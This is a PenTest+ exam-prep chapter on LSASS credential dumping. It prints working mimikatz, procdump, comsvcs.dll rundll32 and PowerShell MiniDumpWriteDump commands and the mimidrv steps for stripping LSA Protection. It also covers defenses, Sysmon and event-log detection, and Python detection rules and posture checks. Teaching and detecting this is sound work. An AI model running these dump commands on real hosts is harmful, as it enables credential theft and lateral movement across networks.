This chapter covers LSASS credential dumping methods, a critical topic for the CompTIA PenTest+ PT0-002 exam under Domain 3: Attacks and Exploits, Objective 3.4. Understanding how attackers extract credentials from LSASS memory is essential for penetration testers and security professionals. Approximately 10-15% of exam questions touch on credential dumping techniques, their detection, and mitigation. You will learn the internal workings of LSASS, various dumping tools and methods, and how to defend against them.
Imagine a hotel where each guest room has a safe deposit box, and the front desk maintains a master key that can open every safe. The master key is stored in a secure cabinet behind the front desk, and only authorized staff can access it. When a guest checks in, the front desk creates a temporary key for that guest's safe, which is used during their stay. However, the master key itself is never handed out; it's always kept in the cabinet. An attacker who gains physical access to the front desk can steal the master key, then open every safe in the hotel without needing individual guest keys. In Windows, the Local Security Authority Subsystem Service (LSASS) is like the front desk: it holds the master keys (credentials) for all logged-on users, including password hashes, Kerberos tickets and, when a legacy provider such as WDigest is enabled, plaintext passwords. Attackers use various techniques to dump these credentials from LSASS memory, essentially stealing the master key to access all user accounts. Just as a hotel might use additional locks or alarms to protect the master key, Windows provides protections like Credential Guard and LSA Protection to prevent unauthorized memory access.
What is LSASS and Why is it a Target?
LSASS (Local Security Authority Subsystem Service) is a critical Windows process responsible for enforcing security policies, handling user logins, and managing credential material. When a user logs on interactively or via Remote Desktop, LSASS caches credentials—including NTLM hashes, Kerberos tickets, and sometimes plaintext passwords—in its process memory. This is necessary for single sign-on (SSO) and network authentication without re-prompting the user. However, this makes LSASS a high-value target for attackers who want to move laterally or escalate privileges.
How LSASS Stores Credentials
LSASS keeps credential material in several structures:

- Logon sessions: each interactive, network or service logon creates a logon session to which the cached credentials are attached.
- Kerberos tickets: the TGT and service tickets are cached so SSO works without re-prompting the user.
- NT hashes: the NT hash of the password (and the LM hash where LM compatibility is still allowed) is kept for NTLM authentication.
- Plaintext passwords: only with certain providers, for example when WDigest is enabled, is the password itself retained.

In memory these structures are encrypted with keys that LSASS itself holds (the LsaProtectMemory/LsaUnprotectMemory routines in lsasrv), so the encryption only defeats partial reads. Any process that can read the whole LSASS address space, meaning SYSTEM or an administrator who has enabled SeDebugPrivilege, can recover both the keys and the encrypted blobs, which is exactly what mimikatz does.
Prerequisites for Dumping LSASS
To dump LSASS memory, an attacker typically needs:

- Administrator privileges: a high-integrity token with SeDebugPrivilege enabled, or SYSTEM.
- Local execution: the dump is taken on the host. Remote variants (lsassy, or procdump/comsvcs launched over PsExec or WMI) still run a dump method on the target and pull the file back over SMB. Impacket's secretsdump.py is a different tool: it reads the SAM, LSA secrets, cached credentials and NTDS.dit, not LSASS memory.
- A way past the defenses: LSA Protection (RunAsPPL), Windows Defender Credential Guard, the Defender attack surface reduction rule that blocks credential stealing from LSASS, and EDR hooks on the relevant APIs can each block or alert on a dump.
Common Dumping Methods
#### 1. Using mimikatz
Mimikatz is the most famous tool for extracting credentials from LSASS. It can dump plaintext passwords, hashes, and Kerberos tickets. Common commands:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
privilege::debug enables SeDebugPrivilege in the mimikatz process token (administrators hold the privilege, but it starts disabled).
sekurlsa::logonpasswords walks every logon session in LSASS memory and prints the NT hash and, where a provider kept one, the plaintext password.
Mimikatz can also dump the cached domain logon verifiers (DCC2) with lsadump::cache, which reads the registry and needs SYSTEM (token::elevate), and Kerberos tickets from every logon session with sekurlsa::tickets /export. kerberos::list only lists the tickets of the current session and needs no special privilege.
#### 2. Using Procdump (Sysinternals)
Procdump can create a memory dump of LSASS process:
procdump -accepteula -ma lsass.exe lsass.dmp
The dump can then be transferred to an attacker machine and analyzed with mimikatz:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
Use the 64-bit mimikatz build to parse a dump taken from a 64-bit host; the dump is parsed offline, so nothing further touches the victim.
#### 3. Using Task Manager
On older or unhardened systems, Task Manager can create a dump:
Open Task Manager > Details tab.
Right-click lsass.exe > Create dump file.
This writes lsass.DMP to the user's %TEMP% folder. On systems with LSA Protection enabled the option fails with an access denied error, and on monitored systems it is logged like any other handle to lsass.exe.
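A dump file is identified by content, not by name: procdump, Task Manager and comsvcs.dll all write the Windows minidump format, which starts with the signature MDMP and a stream directory. The following parser is an added example that is not part of the original chapter: it reads the MINIDUMP_HEADER and directory so a file-monitoring rule can recognize a renamed lsass.dmp and distinguish a full-memory dump (what procdump -ma and comsvcs "full" produce) from a smaller one. The sample dump it builds is constructed for the example (a real header and directory with empty stream bodies); the layout constants follow minidumpapiset.h.

```python
import struct
from typing import Dict, List, Optional

# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags -> 32 bytes, little-endian.
HEADER = struct.Struct("<4sIIIIIQ")
# MINIDUMP_DIRECTORY entry: StreamType, Location.DataSize, Location.Rva -> 12 bytes.
DIRECTORY_ENTRY = struct.Struct("<III")
MINIDUMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793            # low 16 bits of the Version field
MINIDUMP_WITH_FULL_MEMORY = 0x0002   # flag set by procdump -ma / comsvcs "full"
STREAM_TYPES = {3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
                7: "SystemInfoStream", 9: "Memory64ListStream", 15: "MiscInfoStream"}


def parse_minidump(data: bytes) -> Optional[Dict]:
    """Return header fields and the stream directory, or None if data is not a minidump."""
    if len(data) < HEADER.size:
        return None
    sig, version, nstreams, dir_rva, _checksum, timestamp, flags = HEADER.unpack_from(data, 0)
    if sig != MINIDUMP_SIGNATURE or (version & 0xFFFF) != MINIDUMP_VERSION:
        return None
    streams: List[Dict] = []
    for i in range(nstreams):
        off = dir_rva + i * DIRECTORY_ENTRY.size
        if off + DIRECTORY_ENTRY.size > len(data):
            break  # truncated file (e.g. a partially exfiltrated chunk): keep what is there
        stype, size, rva = DIRECTORY_ENTRY.unpack_from(data, off)
        streams.append({"type": STREAM_TYPES.get(stype, f"Stream{stype}"), "size": size, "rva": rva})
    return {"timestamp": timestamp, "flags": flags,
            "full_memory": bool(flags & MINIDUMP_WITH_FULL_MEMORY), "streams": streams}


def looks_like_process_dump(data: bytes) -> bool:
    """Content-based check: a renamed lsass.dmp still starts with a valid minidump header."""
    return parse_minidump(data) is not None


def build_sample_minidump(full_memory: bool = True) -> bytes:
    """Constructed minidump skeleton: real header and directory, empty stream bodies."""
    entries = [(7, 56, 0), (4, 4, 0), (9, 16, 0)]  # SystemInfo, ModuleList, Memory64List
    dir_rva = HEADER.size
    body_rva = dir_rva + len(entries) * DIRECTORY_ENTRY.size
    directory, body = b"", b""
    for stype, size, _ in entries:
        directory += DIRECTORY_ENTRY.pack(stype, size, body_rva + len(body))
        body += b"\x00" * size
    flags = MINIDUMP_WITH_FULL_MEMORY if full_memory else 0
    header = HEADER.pack(MINIDUMP_SIGNATURE, MINIDUMP_VERSION, len(entries), dir_rva, 0, 0x65000000, flags)
    return header + directory + body


if __name__ == "__main__":
    info = parse_minidump(build_sample_minidump())
    print("full memory:", info["full_memory"])
    for s in info["streams"]:
        print(f"  {s['type']:<20} size={s['size']} rva=0x{s['rva']:x}")
```

A real triage would go on to walk ModuleListStream for lsasrv.dll and wdigest.dll, which identifies the dumped process as LSASS regardless of the file name; the header check alone is already enough to catch the common trick of renaming the dump before exfiltration.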
#### 4. Using Comsvcs.dll (Rundll32)
This technique uses the comsvcs.dll library's MiniDump function via rundll32:
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> lsass.dmp full
<PID> is the process ID of lsass.exe (for example from tasklist). The call must come from a token in which SeDebugPrivilege is enabled, which an elevated PowerShell session provides. The same export can be called by ordinal as #24, a variant that defeats naive command-line matching; either form is routinely flagged by EDR.
#### 5. Using PowerShell
PowerShell can call the MiniDumpWriteDump API from dbghelp.dll through P/Invoke (there is no managed wrapper for it in .NET). Run from an elevated session; the last argument value 2 is MiniDumpWithFullMemory:
$sig = '[DllImport("dbghelp.dll", SetLastError = true)] public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, IntPtr hFile, int dumpType, IntPtr exceptionParam, IntPtr userStreamParam, IntPtr callbackParam);'
$dbghelp = Add-Type -MemberDefinition $sig -Name 'DbgHelp' -Namespace 'Win32' -PassThru
$process = Get-Process lsass
$fs = [System.IO.File]::Open('C:\temp\lsass.dmp', 'Create')
$ok = $dbghelp::MiniDumpWriteDump($process.Handle, $process.Id, $fs.SafeFileHandle.DangerousGetHandle(), 2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
$fs.Close()
Add-Type compiles the P/Invoke stub on the fly, which leaves artifacts in %TEMP% and is visible to AMSI and script block logging (Event ID 4104); the handle to lsass.exe is also logged by Sysmon Event ID 10.
Defense Mechanisms
#### LSA Protection (RunAsPPL)
LSA Protection runs LSASS as a Protected Process Light (PPL), preventing non-PPL processes from opening LSASS with full access. To enable:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f
A reboot is required. A value of 1 also writes a UEFI variable so the setting cannot be undone by an administrator from the registry alone; Windows 11 22H2 and later accept 2 for protection without the UEFI lock. This blocks every user-mode dumping tool shown above. The remaining bypass is kernel code: mimikatz's signed mimidrv.sys driver (!+ to load it, then !processprotect /process:lsass.exe /remove) strips the protection, and any vulnerable signed driver can be abused the same way, which is why HVCI and the Microsoft vulnerable driver blocklist matter alongside RunAsPPL.
#### Windows Defender Credential Guard
Credential Guard uses virtualization-based security (VBS) to isolate LSASS secrets. NT hashes, Kerberos TGTs and other domain credentials are held by a separate process, LsaIso.exe, that runs in Virtual Secure Mode (VTL1); LSASS only holds handles to them. Even if an attacker dumps LSASS memory, they will not find usable domain credentials. It does not cover local account hashes in the SAM or credentials captured as they are typed, so the other protections still matter.
Credential Guard needs VBS (the Hyper-V hypervisor, UEFI with Secure Boot, and a 64-bit CPU with virtualization extensions); the full Hyper-V role is not required. To enable it manually, set the VBS and LSA flags and reboot:
reg add HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LsaCfgFlags /t REG_DWORD /d 1 /f
LsaCfgFlags 1 enables Credential Guard with UEFI lock (it cannot then be switched off remotely); 2 enables it without the lock. The same settings are available through Group Policy under Computer Configuration > Administrative Templates > System > Device Guard > Turn On Virtualization Based Security, and LsaIso.exe appears in the process list once it is active. Windows 11 22H2 and later Enterprise editions enable it by default on hardware that meets the requirements.
#### Security Logging
Event ID 4688 (process creation) with command-line auditing enabled captures procdump, rundll32 comsvcs and PowerShell dump attempts. Event ID 4656 (handle to an object) can record a process opening lsass.exe, but only if Audit Kernel Object is on and a SACL has been placed on the LSASS process object; most environments rely on Sysmon Event ID 10 (ProcessAccess) instead, which logs the source image, the GrantedAccess mask and the call trace for every handle to lsass.exe. Microsoft Defender for Endpoint (formerly branded Windows Defender ATP) and other EDR products alert on suspicious LSASS access, and the Defender attack surface reduction rule "Block credential stealing from the Windows local security authority subsystem" blocks it outright.
Detection Techniques
Unusual Process Access: handles to lsass.exe whose GrantedAccess includes PROCESS_VM_READ (0x0010) from anything other than the expected system components (csrss, wininit, svchost, the AV engine). Mimikatz-style access typically shows 0x1010 or 0x1fffff.
Dump Files: Monitoring for creation of .dmp files in sensitive locations.
API Calls: Monitoring for MiniDumpWriteDump calls targeting lsass.
Network Traffic: Large data transfers of dump files to remote hosts.
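The checks above can be expressed directly as rules over the telemetry. The Python below is an added example, not from the original chapter or from any vendor product: it evaluates constructed Sysmon Event ID 10 (ProcessAccess) records and 4688-style process-creation records, flags handles to lsass.exe that carry PROCESS_VM_READ from anything outside a small allowlist, matches the procdump, MiniDumpWriteDump and mimikatz command lines, and resolves the PID argument of a comsvcs.dll MiniDump call against a process inventory so a dump of lsass is not missed when the command line never names it. The allowlist, the PID inventory and the sample events are assumptions for the example and need tuning per environment.

```python
import re
from typing import Dict, List, Optional, Tuple

# Process access rights from winnt.h that allow reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040
MEMORY_READ_MASK = PROCESS_VM_READ | PROCESS_DUP_HANDLE

# Assumed allowlist of images that legitimately read lsass.exe on a typical host.
ALLOWED_LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Command-line signatures for the dump methods in this chapter.
DUMP_CMDLINE_RULES = [
    ("procdump dump of lsass", re.compile(r"procdump(?:64)?(?:\.exe)?\b.*\blsass\b", re.I)),
    ("MiniDumpWriteDump call against lsass",
     re.compile(r"MiniDumpWriteDump.*lsass|lsass.*MiniDumpWriteDump", re.I | re.S)),
    ("mimikatz sekurlsa module", re.compile(r"sekurlsa::", re.I)),
]
# comsvcs.dll takes a PID (export name or ordinal #24), so lsass must be resolved separately.
COMSVCS_RULE = re.compile(r"comsvcs\.dll\s*,?\s*(?:MiniDump|#24)\s+(\d+)", re.I)


def check_process_access(event: Dict) -> Optional[str]:
    """Sysmon Event ID 10: flag handles to lsass.exe that carry memory-read rights."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    granted = int(event["GrantedAccess"], 16)
    if not granted & MEMORY_READ_MASK:
        return None  # e.g. 0x1000 (QUERY_LIMITED_INFORMATION) from a process lister is benign
    source = event["SourceImage"].lower()
    if source in ALLOWED_LSASS_READERS:
        return None
    return f"{source} opened lsass.exe with GrantedAccess 0x{granted:x}"


def check_process_create(event: Dict, pid_to_image: Dict[int, str]) -> Optional[str]:
    """Event ID 4688 (or Sysmon 1): flag command lines that dump lsass."""
    cmdline = event["CommandLine"]
    m = COMSVCS_RULE.search(cmdline)
    if m:
        pid = int(m.group(1))
        target = pid_to_image.get(pid, "unknown")
        if target.lower().endswith("lsass.exe"):
            return f"comsvcs.dll MiniDump of lsass.exe (pid {pid}) via {event['NewProcessName']}"
        return f"comsvcs.dll MiniDump of pid {pid} ({target}), not lsass; still review"
    for label, rx in DUMP_CMDLINE_RULES:
        if rx.search(cmdline):
            return f"{label}: {cmdline}"
    return None


def scan(events: List[Dict], pid_to_image: Dict[int, str]) -> List[Tuple[int, str]]:
    """Run both checks over a batch of events and return (EventID, finding) pairs."""
    findings = []
    for ev in events:
        if ev["EventID"] == 10:
            hit = check_process_access(ev)
        elif ev["EventID"] in (1, 4688):
            hit = check_process_create(ev, pid_to_image)
        else:
            hit = None
        if hit:
            findings.append((ev["EventID"], hit))
    return findings


# Constructed sample telemetry for this example (not real logs).
SAMPLE_PIDS = {696: r"C:\Windows\System32\lsass.exe", 4120: r"C:\Windows\System32\notepad.exe"}
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 4688, "NewProcessName": r"C:\Users\jdoe\AppData\Local\Temp\procdump64.exe",
     "CommandLine": "procdump64.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 696 C:\temp\notes.txt full"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 comsvcs.dll, #24 4120 C:\temp\np.dmp full"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Process"},
]

if __name__ == "__main__":
    for event_id, finding in scan(SAMPLE_EVENTS, SAMPLE_PIDS):
        print(event_id, finding)
```

The Task Manager entry with 0x1000 and the Defender engine are deliberately not findings: a rule that fires on every handle to lsass.exe drowns in noise within minutes, while the GrantedAccess mask plus a short allowlist keeps the signal. The comsvcs case shows why command-line matching alone is not enough: the dump target appears only as a PID, and the output file here is named notes.txt.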
Step-by-Step Attack Flow
Gain initial access (e.g., phishing, exploit).
Elevate privileges to administrator or SYSTEM.
Bypass defenses (e.g., disable AV, use custom tools).
Dump LSASS memory using one of the methods.
Extract credentials offline or in-memory.
Use credentials for lateral movement or privilege escalation.
Key Values and Defaults
LSASS Process Name: lsass.exe
Default Protection: RunAsPPL is off by default on Windows 10; Windows 11 22H2 and later enable it by default on new, enterprise-joined installs. It can be set anywhere through the registry, the "Configure LSASS to run as a protected process" Group Policy setting or MDM, and needs a reboot.
Credential Guard: off by default on Windows 10; enabled by default on Windows 11 22H2 and later Enterprise editions on hardware that supports VBS. It requires VBS (the Hyper-V hypervisor, UEFI with Secure Boot, 64-bit virtualization extensions), not the Hyper-V server role.
WDigest: disabled by default on Windows 8.1/Server 2012 R2 and later (UseLogonCredential absent or 0). On older systems KB2871997 adds the value, but plaintext caching stays on until it is explicitly set to 0. With the value at 1, plaintext passwords are kept in LSASS.
SeDebugPrivilege: required to open lsass.exe for reading. Administrators hold it by default, but it is disabled in the token until enabled (privilege::debug, or the equivalent AdjustTokenPrivileges call).
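Because these defaults depend on both registry values and the Windows version, a posture check is easy to get wrong. The function below is an added example (not from the chapter) that evaluates an offline registry snapshot against the values listed here: RunAsPPL 1 or 2, LsaCfgFlags together with EnableVirtualizationBasedSecurity, and WDigest's UseLogonCredential with its version-dependent default. The snapshot dicts are constructed for the example; on a live host the same values would be read with reg query or the winreg module.

```python
from typing import Dict, List, Optional

# Value paths under HKLM\SYSTEM\CurrentControlSet\Control that govern the protections
# in this chapter. The check reads them from a snapshot dict so it runs offline.
RUNASPPL = r"Lsa\RunAsPPL"
LSACFGFLAGS = r"Lsa\LsaCfgFlags"
VBS_ENABLED = r"DeviceGuard\EnableVirtualizationBasedSecurity"
WDIGEST = r"SecurityProviders\WDigest\UseLogonCredential"

WIN81_BUILD = 9600  # Windows 8.1 / Server 2012 R2: first release where WDigest defaults to off


def assess(snapshot: Dict[str, Optional[int]], windows_build: int) -> List[str]:
    """Return findings for one host. snapshot maps value paths to DWORDs; None means absent."""
    findings: List[str] = []

    ppl = snapshot.get(RUNASPPL)
    if ppl not in (1, 2):
        findings.append("LSA Protection off: set RunAsPPL to 1 (UEFI lock) or 2 (no lock); "
                        "any administrator can open lsass.exe for reading")
    elif ppl == 2:
        findings.append("LSA Protection on without UEFI lock: an administrator can clear RunAsPPL and reboot")

    cg, vbs = snapshot.get(LSACFGFLAGS), snapshot.get(VBS_ENABLED)
    if cg in (1, 2) and vbs != 1:
        findings.append("Credential Guard requested via LsaCfgFlags but VBS is not enabled; "
                        "secrets remain in lsass.exe")
    elif cg not in (1, 2):
        findings.append("Credential Guard off: a usable lsass dump yields NT hashes and Kerberos tickets")

    # WDigest edge case: on build 9600 and later an absent value means 0 (plaintext not kept);
    # on older hosts KB2871997 adds the value but plaintext stays until it is explicitly 0.
    wd = snapshot.get(WDIGEST)
    if wd == 1 or (wd is None and windows_build < WIN81_BUILD):
        findings.append("WDigest keeps plaintext passwords in lsass.exe: set UseLogonCredential to 0")

    return findings


# Constructed snapshots for the example.
HARDENED_WIN11 = {RUNASPPL: 1, LSACFGFLAGS: 1, VBS_ENABLED: 1, WDIGEST: None}
LEGACY_RDP_HOST = {RUNASPPL: None, LSACFGFLAGS: None, VBS_ENABLED: None, WDIGEST: 1}

if __name__ == "__main__":
    for name, snap, build in (("hardened", HARDENED_WIN11, 22621), ("rdp host", LEGACY_RDP_HOST, 9600)):
        print(name, assess(snap, build) or ["no findings"])
```

The WDigest branch is the one worth reading twice: an absent UseLogonCredential value is safe on Windows 8.1 and later but means plaintext caching on a Windows 7 or Server 2008 R2 host, so a check that only looks for the value being 1 will clear exactly the legacy systems where the exposure is worst.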
Interaction with Other Technologies
Active Directory: LSASS caches domain credentials; dumping can reveal domain admin hashes.
Kerberos: Dumped tickets can be used for pass-the-ticket attacks.
RDP: Dumping after RDP session reveals the authenticating user's credentials.
SMB: NTLM hashes can be used for pass-the-hash attacks.
Common Commands and Syntax
# Enable debug privilege
mimikatz # privilege::debug
# Dump passwords
mimikatz # sekurlsa::logonpasswords
# Create process dump
procdump -ma lsass.exe lsass.dmp
# MiniDump via comsvcs
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 1234 lsass.dmp full
Gain Initial Access
The attacker first compromises a system through phishing, exploiting a vulnerability, or using stolen credentials. This provides a foothold with user-level privileges. The attacker may use a reverse shell, meterpreter, or custom malware. At this stage, the attacker cannot dump LSASS because they lack the necessary privileges (SeDebugPrivilege or SYSTEM).
Escalate Privileges
To dump LSASS, the attacker must have administrator or SYSTEM privileges. Common escalation methods include exploiting local vulnerabilities (e.g., hot potato, token kidnapping), using Pass-the-Hash to access an admin account, or leveraging misconfigured services. Once elevated, the attacker gains SeDebugPrivilege, which allows them to open lsass.exe with PROCESS_VM_READ access.
Bypass Defenses
Modern systems have defenses like LSA Protection (RunAsPPL) and Credential Guard. If RunAsPPL is enabled, the attacker must bring kernel code, for example mimikatz's mimidrv.sys or a vulnerable signed driver, to strip the protection. If Credential Guard is active, the dump holds no usable NT hashes or TGTs: those secrets live in LsaIso in VTL1, which neither user-mode tools nor a kernel driver in the normal OS can read. Attackers then shift to credentials Credential Guard does not cover, such as local account hashes in the SAM, or to capturing credentials as they are entered for new logons (keylogging, a malicious SSP registered in LSASS). They may also disable or evade antivirus/EDR using obfuscation or custom tools.
Dump LSASS Memory
With elevated privileges and bypassed defenses, the attacker dumps the LSASS process memory. They can use mimikatz's `sekurlsa::logonpasswords` to extract credentials directly in memory, or create a memory dump file using Procdump, Task Manager, or comsvcs.dll. The dump file is then exfiltrated or analyzed offline. The attacker must avoid detection by EDR, which may alert on MiniDumpWriteDump calls targeting lsass.exe.
Extract and Use Credentials
From the dumped memory, the attacker extracts NTLM hashes, plaintext passwords, and Kerberos tickets. These can be used for lateral movement (e.g., Pass-the-Hash to access other systems), privilege escalation (e.g., use domain admin hash), or persistence (e.g., golden ticket). The attacker may also crack hashes offline to obtain plaintext passwords for further attacks.
In a real-world enterprise environment, LSASS credential dumping is a common post-exploitation technique used by attackers to move laterally and escalate privileges. For example, during a penetration test of a large organization, I found that many domain-joined Windows workstations had LSA Protection disabled by default. After gaining initial access via a phishing email and escalating to local admin using a vulnerable driver, I used mimikatz to dump plaintext passwords from LSASS. This yielded the credentials of a domain user who had recently connected to a file share. Using those credentials, I accessed the file server and found a script containing a domain admin password. This allowed me to compromise the entire domain.
Another scenario involved a client that had deployed Credential Guard on all Windows 10 Enterprise systems. During an internal test, I could not dump usable credentials from LSASS: the NT hashes and TGTs were held by LsaIso inside VBS, out of reach of user-mode tools and of kernel drivers in the normal OS alike. What Credential Guard does not cover is credentials that have not yet been isolated. Local account hashes in the SAM stay dumpable, and credentials typed into new logons can still be captured inside LSASS, for example by a malicious security support provider, before they reach the isolated process. Strong protection narrows the attack surface; it does not remove the need to monitor LSASS and to keep local administrator passwords unique.
A common misconfiguration is enabling WDigest for backward compatibility with older applications. In one engagement, a healthcare organization had WDigest enabled on their RDP servers to support legacy authentication. Using mimikatz, I extracted plaintext passwords for all users who had connected via RDP, including several domain administrators. This allowed me to take over the domain within minutes. The lesson is that disabling WDigest and enabling LSA Protection are critical first steps.
Performance considerations: on servers with many concurrent logon sessions (for example RDS hosts), LSASS grows large. A full dump is roughly the size of the process's committed memory: tens of megabytes on a workstation, hundreds of megabytes on a busy terminal server. Writing it stalls the process briefly (MiniDumpWriteDump suspends the target's threads) and leaves a large file to move. Attackers compress and chunk the dump for exfiltration, or parse it on the host and take only the extracted secrets; defenders should monitor for large outbound transfers from sensitive systems and for archive creation in temp directories.
When misconfigured, LSASS can become a single point of failure. If LSA Protection is enabled without testing, any authentication plug-in that is not signed for PPL (custom SSPs, some smart-card or third-party identity components) is silently refused by LSASS. In one case, a security team enabled RunAsPPL on a domain controller, which broke the Microsoft Exchange service because it needed to access LSASS for authentication. The service had to be restarted with a special flag. Windows provides an audit mode for exactly this situation: setting AuditLevel (REG_DWORD 8) under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe logs the plug-ins that would be blocked as events 3065 and 3066 in the Microsoft-Windows-CodeIntegrity/Operational log. Run that in a staging environment before enforcing the setting.
The PT0-002 exam tests LSASS credential dumping under Objective 3.4: Given a scenario, perform post-exploitation techniques. Specifically, you need to know:
How to dump credentials from LSASS using mimikatz, procdump, and other tools.
The prerequisites (administrator privileges, SeDebugPrivilege).
Defenses: LSA Protection (RunAsPPL), Credential Guard, WDigest disabling.
Detection methods: Event IDs 4688, 4656, and EDR alerts.
Common wrong answers:

1. Thinking that any user can dump LSASS. Many candidates assume that because they can see the process in Task Manager, they can dump it. Only processes with SeDebugPrivilege enabled (administrators) or SYSTEM can open LSASS with the required access. The exam will test this with scenarios where the attacker has only user privileges.
2. Confusing LSA Protection with Credential Guard. Candidates often mix up RunAsPPL (runs LSASS as a PPL) with Credential Guard (isolates credentials in VBS). RunAsPPL blocks non-PPL processes from opening LSASS; Credential Guard keeps the usable secrets out of LSASS in the first place. If the exam asks which defense makes a dump worthless even when the attacker has admin rights, the answer is Credential Guard.
3. Believing that disabling WDigest prevents all credential dumping. Disabling WDigest stops plaintext passwords from being stored, but NT hashes and Kerberos tickets are still available. A scenario where WDigest is disabled and the attacker still extracts hashes is entirely possible.
4. Assuming that a memory dump of LSASS always contains credentials. If Credential Guard is enabled, the dump contains only handles and encrypted blobs that are useless without the key material held in the isolated environment. The exam may test this edge case.
Key numbers and terms:
RunAsPPL registry value: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL (DWORD 1 to enable).
Event ID 4688: Process creation; look for procdump, rundll32, or powershell launching.
Event ID 4656: handle to an object; look for lsass.exe being opened with PROCESS_VM_READ. It requires a SACL on the process object; Sysmon Event ID 10 gives the same information without one.
WDigest: Disabled by default on Windows 8.1/Server 2012 R2+.
SeDebugPrivilege: Required for dumping; administrators have it by default.
Exam tips:
If a question asks about extracting plaintext passwords, check whether WDigest is enabled. If not, the attacker gets NT hashes and Kerberos tickets, which still support pass-the-hash and pass-the-ticket.
If the system has Credential Guard, dumping LSASS is ineffective; the attacker must turn to credentials the isolation does not cover (SAM hashes, cached verifiers, credentials captured at logon time) or to a different technique altogether, not to the LSAISO process itself.
The easiest way to dump LSASS on a non-hardened system is via Task Manager if the attacker has GUI access, but procdump is more reliable.
Always look for the privilege escalation step before dumping – the exam will test the full attack chain.
LSASS stores NTLM hashes, Kerberos tickets, and (if WDigest enabled) plaintext passwords for all logged-on users.
Dumping LSASS requires SeDebugPrivilege, enabled in the token, which administrators hold by default; SYSTEM is not required.
Mimikatz is the primary tool, but procdump, comsvcs.dll, and PowerShell can also dump LSASS memory.
LSA Protection (RunAsPPL) makes LSASS a protected process; bypass requires a kernel driver.
Credential Guard isolates credentials in a virtual secure environment, making LSASS dumps useless.
WDigest is disabled by default on Windows 8.1+; enabling it stores plaintext passwords in LSASS.
Event ID 4688 (process creation) and 4656 (handle to object) can detect dumping attempts.
Pass-the-Hash and Pass-the-Ticket attacks use extracted credentials for lateral movement.
These come up on the exam all the time. Here's how to tell them apart.
Mimikatz (In-Memory Dump)
Extracts credentials directly from LSASS memory without writing a dump file to disk.
Requires SeDebugPrivilege and runs in-memory; no forensic artifact on disk.
Can be detected by EDR monitoring for process injection or API calls like OpenProcess.
More stealthy if executed via reflective DLL loading or PowerShell without touching disk.
Supports extracting plaintext passwords, hashes, and Kerberos tickets in one command.
Procdump (File Dump)
Creates a .dmp file on disk, which can be detected by file monitoring EDR.
Requires SeDebugPrivilege; the dump file can be exfiltrated later for offline analysis.
Easier to use on systems where mimikatz is blocked; dump can be analyzed on another machine.
Generates a large file (often 100+ MB) that may trigger alerts on file creation or size.
Dump must be parsed with mimikatz or other tools offline; slower than in-memory extraction.
Mistake
Only mimikatz can dump LSASS credentials.
Correct
Many tools can dump LSASS, including procdump, comsvcs.dll, PowerShell scripts, and custom C# code. Mimikatz is just the most famous. The exam tests multiple methods.
Mistake
Enabling LSA Protection (RunAsPPL) completely prevents LSASS dumping.
Correct
RunAsPPL makes it harder but not impossible. Attackers can load a kernel driver (e.g., mimidrv) to remove the protection, or abuse a vulnerable signed driver (bring your own vulnerable driver) to do the same. The exam may test that RunAsPPL is a mitigation, not a complete solution.
Mistake
Credential Guard prevents all credential theft.
Correct
Credential Guard protects the NT hashes and Kerberos tickets that LSASS would otherwise hold, but it does not cover everything: local account hashes in the SAM, cached domain logon verifiers, credentials captured at the moment of logon by a malicious SSP or keylogger, and credentials handled by applications outside LSASS are all still exposed. The LSAISO process itself is not reachable from the normal OS, even with kernel access, so the attacker works around it rather than through it.
Mistake
You need SYSTEM privileges to dump LSASS.
Correct
Administrator privileges with SeDebugPrivilege are sufficient. SYSTEM is not required. Many tools run under an admin account and can dump LSASS without elevating to SYSTEM.
Mistake
Dumping LSASS is always noisy and easily detected.
Correct
While some methods are noisy (e.g., procdump creates a file), others like mimikatz's in-memory extraction may not generate file creation events. Skilled attackers use reflective DLL injection or fileless techniques to evade detection.
LSASS credential dumping is the process of extracting authentication credentials (passwords, hashes, tickets) from the memory of the Local Security Authority Subsystem Service (LSASS) process on Windows. Attackers use tools like mimikatz to read LSASS memory and obtain credentials for lateral movement or privilege escalation. The exam tests your knowledge of techniques, tools, and defenses.
